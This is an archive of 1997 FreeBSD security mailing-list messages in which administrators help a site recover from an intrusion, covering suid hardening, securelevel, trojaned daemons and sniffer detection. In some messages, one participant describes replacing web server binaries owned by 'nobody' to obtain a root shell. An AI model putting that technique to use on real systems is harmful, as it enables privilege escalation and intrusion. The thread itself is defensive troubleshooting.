Matthew N. Dodd wrote: > =)As a general rule I set all suid/sgid system executeables schg and run > =)with securelevel set to 1 or 2. ^^^^^^^^^^^^^^^^^^^^^^^^^ > =) > =)Getting rid of any unecessary suid/sgid programs would be good too. > > That wouldn't do any good if the user can chflags noschg on the > binaries you have schg on. 'man init' /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 15:31:26 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08197 for security-outgoing; Mon, 28 Jul 1997 15:31:26 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08186 for ; Mon, 28 Jul 1997 15:31:19 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06464; Mon, 28 Jul 1997 15:31:13 -0700 (PDT) Date: Mon, 28 Jul 1997 15:31:12 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)I'm a little paranoid, as somebody hacked our syste about a month ago and =)said he would do it again. Where is the source code for /bin/login? I've =)checked /usr/src, the only thing I find is =)/usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but =)that doesn't seem right. Did you ever track it down how they replaced the /bin/login? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:44:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09160 for security-outgoing; Mon, 28 Jul 1997 15:44:56 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09150 for ; Mon, 28 Jul 1997 15:44:51 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06534; Mon, 28 Jul 1997 15:44:28 -0700 (PDT) Date: Mon, 28 Jul 1997 15:44:27 -0700 (PDT) From: Vincent Poy To: Karl Denninger cc: Robert Watson , Adam Shostack , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <19970728164228.19622@Jupiter.Mcs.Net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Karl Denninger wrote: [snip] =)> Does login require suid, or does gettytab run it as root anyway? =)> =)> Robert N Watson =) =)If you take the SUID off login it works fine, PROVIDED you don't try to use =)it to "re-login" (a rather common thing for Berzerkelyoids to do). What did you mean by "re-login"? Is that rlogin you're talking about? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:48:19 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09295 for security-outgoing; Mon, 28 Jul 1997 15:48:19 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09290 for ; Mon, 28 Jul 1997 15:48:16 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27376; Mon, 28 Jul 1997 18:47:20 GMT Date: Mon, 28 Jul 1997 18:47:20 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Nate Williams cc: Robert Watson , Vincent Poy , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <199707282100.PAA07719@rocky.mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk httpd and sessiond initially are run as root, before they spawn off into separate processes. If you replace httpd and sessiond with your own code, so that before it changes its uid and forks, you will get a root shell ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Nate Williams wrote: :> There IS one common hole I've seen apache and stronghold have, and that is :> that some people like to leave their sessiond or httpd files owned by :> 'nobody'. This allows somebody running CGI on that system to replace :> those binaries with their own, hacked binaries (since the scripts are :> usually owned as nobody), and the next time httpd starts, they can make it :> write a root shell, or just about anything along those lines. : :If it's running as 'nobody', it can't create a root shell. It can :create a 'nobody' shell though... : : : :Nate : From owner-freebsd-security Mon Jul 28 15:49:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09466 for security-outgoing; Mon, 28 Jul 1997 15:49:55 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09451 for ; Mon, 28 Jul 1997 15:49:51 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27656; Mon, 28 Jul 1997 18:49:02 GMT Date: Mon, 28 Jul 1997 18:49:02 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Robert Watson cc: Adam Shostack , Vincent Poy , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I was exploring a little while ago programming a ch-rooted telnetd to chroot to /usr if the person was over a specific uid. I got it running nicely, but never got to put it into production to fully test it...had to do a lot of copying (passwd files, etc, just like ftp). ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Robert Watson wrote: :On Mon, 28 Jul 1997, Adam Shostack wrote: : :> Vincent Poy wrote: :> :> su really should be setuid. Everything else is debatable. My :> advice is to turn off all setuid bits except those you know you need :> (possibly w, who, ps, ping, at, passwd) :> :> find / -xdev -perm -4000 -ok chmod u-s {} \; :> find /usr -xdev -perm -4000 -ok chmod u-s {} \; :> find / -xdev -perm -2000 -ok chmod g-s {} \; :> find /usr -xdev -perm -2000 -ok chmod g-s {} \; :> # The semicolons are part of the line : :Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) :require root access to delivery to local mailboxes; crontab related stuff, :terminal locking, some kerberos commands, local XWindows servers, and su :all rely on suid. : :What type of secured environment are you hoping to create? If root access :is only to be used from the console, and shared functions like :xwindows/mailstuff/user crontab aren't needed, you can probably just :disable all the suid-root programs, or suid-anything programs. Look also :at the sgid programs that scan kmem. Ideally, you'd also put the system :in a higher secure level, and mount all partitions non-suid, as long as :login kept working :). : :Does login require suid, or does gettytab run it as root anyway? : : Robert N Watson : :Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ :Network Security Research, Trusted Information Systems http://www.tis.com/ :Network Administrator, SafePort Network Services http://www.safeport.com/ :robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ : From owner-freebsd-security Mon Jul 28 15:51:16 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09572 for security-outgoing; Mon, 28 Jul 1997 15:51:16 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09567 for ; Mon, 28 Jul 1997 15:51:14 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27707; Mon, 28 Jul 1997 18:50:07 GMT Date: Mon, 28 Jul 1997 18:50:07 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Vincent Poy cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk As long as httpd and sessiond are owned by something other than what cgi scripts run as you're safe, but if they are both nobody, you can replace the binary...We had it happen to us once with v1.2 this is how I know. ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Vincent Poy wrote: :On Mon, 28 Jul 1997, [Mario1-] wrote: : :=)On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: :=) :=): There IS one common hole I've seen apache and stronghold have, and that is :=): that some people like to leave their sessiond or httpd files owned by :=): 'nobody'. This allows somebody running CGI on that system to replace :=): those binaries with their own, hacked binaries (since the scripts are :=): usually owned as nobody), and the next time httpd starts, they can make it :=): write a root shell, or just about anything along those lines. :=) :=)Now THIS is interesting. I was thinking about this a little while ago. :=)Didn't it seem like 'nobody' had an awful lot of processes running :=)last night? : : Yes, it did but they were all httpd and I understand apache httpd :has fixed this security hole a long time ago since we are using the new :version of apache. : : :Cheers, :Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ :Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] :GaiaNet Corporation - M & C Estate / / / / | / | __] ] :Beverly Hills, California USA 90210 / / / / / |/ / | __] ] :HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] : : From owner-freebsd-security Mon Jul 28 16:07:18 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10427 for security-outgoing; Mon, 28 Jul 1997 16:07:18 -0700 (PDT) Received: from main.gbdata.com (USR1-1.detnet.com [207.113.12.25]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10419 for ; Mon, 28 Jul 1997 16:07:14 -0700 (PDT) Received: (from gclarkii@localhost) by main.gbdata.com (8.8.5/8.8.5) id SAA02009; Mon, 28 Jul 1997 18:06:59 -0500 (CDT) From: Gary Clark II Message-Id: <199707282306.SAA02009@main.gbdata.com> Subject: Re: security hole in FreeBSD To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Mon, 28 Jul 1997 18:06:59 -0500 (CDT) Cc: winter@jurai.net, security@FreeBSD.ORG, johnnyu@accessus.net, mario1@primenet.com In-Reply-To: from Vincent Poy at "Jul 28, 97 03:28:38 pm" X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote: > On Mon, 28 Jul 1997, Matthew N. Dodd wrote: > > =)On Mon, 28 Jul 1997, Vincent Poy wrote: > =)> I'll do that as soon as the machine comes back up. I heard that > =)> suid programs can be a problem too but which ones are required to be suid? > =) > =)As a general rule I set all suid/sgid system executeables schg and run > =)with securelevel set to 1 or 2. > =) > =)Getting rid of any unecessary suid/sgid programs would be good too. > > That wouldn't do any good if the user can chflags noschg on the > binaries you have schg on. Which is why you run the system at a VERY low security level. You would have to reboot into single user mode to do it then. > > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Gary -- Gary Clark II (N5VMF) | I speak only for myself and "maybe" my company gclarkii@GBData.COM | Member of the FreeBSD Doc Team Providing Internet and ISP startups - http://WWW.GBData.com for information FreeBSD FAQ at ftp://ftp.FreeBSD.ORG/pub/FreeBSD/docs/FAQ.latin1 From owner-freebsd-security Mon Jul 28 16:07:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10457 for security-outgoing; Mon, 28 Jul 1997 16:07:35 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10449 for ; Mon, 28 Jul 1997 16:07:30 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id TAA26904; Mon, 28 Jul 1997 19:06:47 -0400 (EDT) Date: Mon, 28 Jul 1997 19:06:47 -0400 (EDT) From: Brian Buchanan To: "Nicole H." cc: security@FreeBSD.ORG Subject: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Nicole H. wrote: > Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a > machine running in promiscuous mode? > I was wondering the same thing when I read a clause prohibiting the use of network cards in promiscuous mode in the CMU network use policy. I asked some computer security people I knew about this and their response was that it is not possible to detect if a network card is in promiscious mode unless you have access to the machine it's in - i.e., that you can look at ifconfig on that machine. From owner-freebsd-security Mon Jul 28 16:15:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10952 for security-outgoing; Mon, 28 Jul 1997 16:15:29 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10942 for ; Mon, 28 Jul 1997 16:15:21 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06831; Mon, 28 Jul 1997 16:15:14 -0700 (PDT) Date: Mon, 28 Jul 1997 16:15:13 -0700 (PDT) From: Vincent Poy To: "Jordan K. Hubbard" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <4908.870127835@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)I think you are describing the symptom, not the problem. =) =)This looks very much like a system which was broken into and then =)trojan'd to allow easier, more invisible access. How do you know, =)for example, that your telnetd is really telnetd? Did you verify that? ;) Well, because I connect to the system using telnet ;) Also, this guy has been known to break in to machines (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked irc.hardlink.com. I think this person goes around hacking machine after machine, and nobody does anything about it. =)Also, I'd check that inetd.conf file again and make _really sure_ you =)haven't left remote shell access enabled - a lot of people miss that =)because it's not explicitly labelled "rlogin" like they might expect. I checked and disabled everything except telnetd in /etc/inetd.conf and rebooted the machine and then he kicked all of us who are admins out and shutdown the system. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:19:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11229 for security-outgoing; Mon, 28 Jul 1997 16:19:04 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11224 for ; Mon, 28 Jul 1997 16:18:58 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id TAA28134; Mon, 28 Jul 1997 19:18:55 -0400 (EDT) Date: Mon, 28 Jul 1997 19:18:54 -0400 (EDT) From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > True but if you needed to compile -current, you would need to > remove the schg flags on some binaries before the make world. I was under the impression that doing a 'make world' in multiuser mode wasn't optimal. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 16:18:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11211 for security-outgoing; Mon, 28 Jul 1997 16:18:49 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11197 for ; Mon, 28 Jul 1997 16:18:39 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06857; Mon, 28 Jul 1997 16:18:31 -0700 (PDT) Date: Mon, 28 Jul 1997 16:18:31 -0700 (PDT) From: Vincent Poy To: Ollivier Robert cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <19970728230758.23621@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Ollivier Robert wrote: =)According to Vincent Poy: =)> Nope, when I added perl5 yesterday from the ports tree, I deleted =)> the perl5.003 and sperl5.003 that was there after it got updated to =)> perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way? =) =)Not if it is CURRENT from later than May. No hole that we know of anyway. The CURRENT is from June 10th, 1997. =)> True but netstat wasn't working anymore after we kicked him off =)> the first time and rejected all packets from his ip # when he came back =)> on. =) =)LSOF is your friend in case you haven't compiled it yet. Only if I can get on the machine, it won't even boot in single user mode now. /bin/csh and /bin/sh has been deleted. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:17:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11112 for security-outgoing; Mon, 28 Jul 1997 16:17:25 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11097 for ; Mon, 28 Jul 1997 16:17:10 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06842; Mon, 28 Jul 1997 16:17:05 -0700 (PDT) Date: Mon, 28 Jul 1997 16:17:04 -0700 (PDT) From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)> =)As a general rule I set all suid/sgid system executeables schg and run =)> =)with securelevel set to 1 or 2. =) ^^^^^^^^^^^^^^^^^^^^^^^^^ =)> That wouldn't do any good if the user can chflags noschg on the =)> binaries you have schg on. =) =)'man init' True but if you needed to compile -current, you would need to remove the schg flags on some binaries before the make world. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:20:09 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11389 for security-outgoing; Mon, 28 Jul 1997 16:20:09 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11321 for ; Mon, 28 Jul 1997 16:20:01 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06876; Mon, 28 Jul 1997 16:19:34 -0700 (PDT) Date: Mon, 28 Jul 1997 16:19:34 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)httpd and sessiond initially are run as root, before they spawn off into =)separate processes. If you replace httpd and sessiond with your own code, =)so that before it changes its uid and forks, you will get a root shell That's true too since even if you kill the first httpd, the other processes don't die. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:26:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11974 for security-outgoing; Mon, 28 Jul 1997 16:26:34 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11965 for ; Mon, 28 Jul 1997 16:26:31 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06932; Mon, 28 Jul 1997 16:25:31 -0700 (PDT) Date: Mon, 28 Jul 1997 16:25:30 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)As long as httpd and sessiond are owned by something other than what cgi =)scripts run as you're safe, but if they are both nobody, you can replace =)the binary...We had it happen to us once with v1.2 this is how I know. Hmmm, what should the owners be for those files? Since the apache cgi scripts are owned by root as far as I can remember. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:30:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12301 for security-outgoing; Mon, 28 Jul 1997 16:30:38 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12296 for ; Mon, 28 Jul 1997 16:30:35 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06966; Mon, 28 Jul 1997 16:30:30 -0700 (PDT) Date: Mon, 28 Jul 1997 16:30:30 -0700 (PDT) From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> True but if you needed to compile -current, you would need to =)> remove the schg flags on some binaries before the make world. =) =)I was under the impression that doing a 'make world' in multiuser mode =)wasn't optimal. I know but when all the admins are remote, it has to be done multiuser. Is there a way to push the secure level up to 2 and then push it down when a make world is needed? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:36:36 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12790 for security-outgoing; Mon, 28 Jul 1997 16:36:36 -0700 (PDT) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.7]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id QAA12782 for ; Mon, 28 Jul 1997 16:36:34 -0700 (PDT) Received: (qmail 14918 invoked from network); 28 Jul 1997 23:36:06 -0000 Received: from geekgirl.mediacity.com (HELO geekgirl) (208.138.36.24) by mail001.mediacity.com with SMTP; 28 Jul 1997 23:36:06 -0000 Date: Mon, 28 Jul 1997 04:40:47 -0800 From: "Nicole H." Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) To: "Nicole H." , Brian Buchanan Cc: security@FreeBSD.ORG X-Mailer: Z-Mail Pro 6.1 (Win32 - 021297), NetManage Inc. X-Face: Dy;P!H@)Go.{^Epw&,}@q4ReQ3iOqFrASM63QjFsK/'XnOO67}+{szQ|oo]]`]/.r,g5lx; w+F^YYL4j Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > On Mon, 28 Jul 1997, Nicole H. wrote: > > > Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a > > machine running in promiscuous mode? > > > > I was wondering the same thing when I read a clause prohibiting the use of > network cards in promiscuous mode in the CMU network use policy. I asked > some computer security people I knew about this and their response was > that it is not possible to detect if a network card is in promiscious mode > unless you have access to the machine it's in - i.e., that you can look at > ifconfig on that machine. What is the range of sniffing? I.E. can the "sniffer" sniff past switched networks? What is the "range" of sniffing? Thanks Nicole nicole@mediacity.com |\ __ /| (`\ http://www.mediacity.com Nicole Harrington | o_o |__ ) ) Phone: 415-237-1464 // \\ Pager: 415-301-2482 Systems Administrator ------------------------(((---(((------------------------------------- ******* * ***** What do you mean Spelling Errors? * * * My Modem is Error Correcting! * CAUTION: I'm no doctor, I only tell computers what to do. Nothing in this document should be construed as medical advice. My opinions are subject to the availability of information. I learn new things each day, and so may change my opinions. Courtesy is owed. Respect is earned. Love is given. -- ----------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 16:49:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA13424 for security-outgoing; Mon, 28 Jul 1997 16:49:12 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA13413 for ; Mon, 28 Jul 1997 16:49:07 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id TAA26995; Mon, 28 Jul 1997 19:49:04 -0400 (EDT) Date: Mon, 28 Jul 1997 19:49:03 -0400 (EDT) From: Brian Buchanan To: "Nicole H." cc: security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > What is the range of sniffing? 